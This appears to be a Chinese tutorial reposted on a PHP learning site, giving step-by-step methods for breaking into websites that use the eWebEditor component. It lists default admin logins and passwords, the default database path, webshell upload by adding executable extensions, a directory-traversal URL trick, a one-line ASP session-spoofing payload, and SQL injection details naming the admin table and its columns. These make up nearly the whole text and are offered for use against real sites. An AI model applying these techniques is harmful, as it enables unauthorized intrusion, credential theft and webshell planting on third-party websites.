来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 作者:暗月1、常规入侵默认后台:ewebeditor/admin_login.asp默认密码:admin admin8882、默认数据库db/ewebeditor.mdb有时候可能修改成asp 或者是asa进了后台就要上传木马添加aaspsp 或者asa cer aspx ph...
作者:暗月
1、常规入侵 默认后台:ewebeditor/admin_login.asp 默认密码:admin admin888 2、默认数据库 db/ewebeditor.mdb 有时候可能修改成asp 或者是asa 进了后台就要上传木马 添加aaspsp 或者asa cer aspx php 没有找到后台就要分析数据库 用明小子打开 3、看style(样式哪里)如何有asp aaspsp asa 那么我们就要构造语句 ID=45&style=s_exampleremote ewebeditor.asp?ID=45&style=s_exampleremote 4、ewebeditor遍历路径漏洞 上传文件管理---选择样式目录(随便选一个目录) 得到: ewebeditor/admin_uploadfile.asp?id=14 在id=14后面添加&dir=.. 再加&dir=../.. &dir=../../../.. 看到整个网站文件了 5、eWebEditor session欺骗漏洞 保存为asp格式上传到网站 <%Session("eWebEditor_User") = "11111111"%> 然后访问网页 再来访问Admin_Default.asp 6、eweb2.7版本以下一个注入 eWebEditor.asp?id=14&style=standard http://www.2cto.com /eWebEdito216/eWebEditor.asp?id=14&style=standard eweb默认的管理员表是:ewebeditor_system 这个表下的默认两个列名为:sys_UserName和sys_userpass |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com